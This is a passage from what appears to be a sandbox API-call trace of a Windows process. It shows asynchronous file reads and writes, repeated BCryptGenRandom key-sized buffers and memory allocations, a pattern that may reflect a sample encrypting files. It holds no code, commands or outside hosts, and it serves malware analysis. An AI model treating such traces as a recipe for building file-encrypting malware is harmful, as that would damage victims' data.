lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.961] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0084.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0084.966] CloseHandle (hObject=0x3bc) returned 1 [0084.982] free (_Block=0x3d70048) [0084.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.007] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.007] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.007] free (_Block=0x1ff1e60) [0085.007] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.007] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.008] free (_Block=0x1ff1e60) [0085.008] free (_Block=0x1ff1930) [0085.008] free (_Block=0x77d800) [0085.008] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.022] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.022] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.022] free (_Block=0x1ff1e60) [0085.022] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.022] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.023] free (_Block=0x1ff1e60) [0085.023] free (_Block=0x1ff1930) [0085.023] free (_Block=0x77d800) [0085.023] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.185] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.194] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.194] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.194] free (_Block=0x77d800) [0085.194] calloc (_Count=0x41, _Size=0x4) returned 0x3e700e8 [0085.194] calloc (_Count=0x82, _Size=0x4) returned 0x3e701f8 [0085.195] free (_Block=0x3e700e8) [0085.195] free (_Block=0x3e701f8) [0085.200] free (_Block=0x77d908) [0085.200] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0085.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.209] ReadFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x1266, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0085.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.247] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.247] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.247] free (_Block=0x1ff1e60) [0085.247] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.247] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.248] free (_Block=0x1ff1e60) [0085.248] free (_Block=0x1ff1930) [0085.248] free (_Block=0x77d800) [0085.248] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.271] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.271] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.271] free (_Block=0x77d800) [0085.271] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.271] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.271] free (_Block=0x1ff1930) [0085.271] free (_Block=0x1ff1a40) [0085.271] free (_Block=0x77d908) [0085.271] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.282] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.282] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.282] free (_Block=0x77d800) [0085.282] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.282] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.282] free (_Block=0x1ff1930) [0085.282] free (_Block=0x1ff1a40) [0085.282] free (_Block=0x77d908) [0085.282] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.294] CloseHandle (hObject=0x3b8) returned 1 [0085.298] free (_Block=0x1fb18c0) [0085.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.314] CloseHandle (hObject=0x3bc) returned 1 [0085.315] free (_Block=0x3d70048) [0085.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.359] CloseHandle (hObject=0x3ac) returned 1 [0085.361] free (_Block=0x3e30078) [0085.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.362] WriteFile (in: hFile=0x3b4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.545] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.562] CloseHandle (hObject=0x3ac) returned 1 [0085.570] free (_Block=0x1ff1e60) [0085.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.588] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.596] ReadFile (in: hFile=0x3c4, lpBuffer=0x3df015c, nNumberOfBytesToRead=0xb92, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0085.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.597] CloseHandle (hObject=0x3bc) returned 1 [0085.597] free (_Block=0x3db00b8) [0085.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.629] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.651] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.652] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.679] WriteFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.697] ReadFile (in: hFile=0x3c4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.714] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0085.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.736] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.893] CloseHandle (hObject=0x3c0) returned 1 [0085.893] free (_Block=0x3d70048) [0085.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.894] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.906] CloseHandle (hObject=0x3ac) returned 1 [0085.906] free (_Block=0x3df0008) [0085.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.918] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6114, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0085.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0085.940] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.940] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.940] free (_Block=0x77d800) [0085.940] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.940] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.940] free (_Block=0x1ff1930) [0085.940] free (_Block=0x1ff1a40) [0085.940] free (_Block=0x77d908) [0085.941] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.956] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x2fce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0085.972] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0085.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0087.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0087.345] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.345] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.345] free (_Block=0x77d800) [0087.345] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.345] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.345] free (_Block=0x1ff1930) [0087.345] free (_Block=0x1ff1a40) [0087.345] free (_Block=0x77d908) [0087.345] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0087.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0087.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0087.379] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.379] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.379] free (_Block=0x77d800) [0087.379] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.379] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 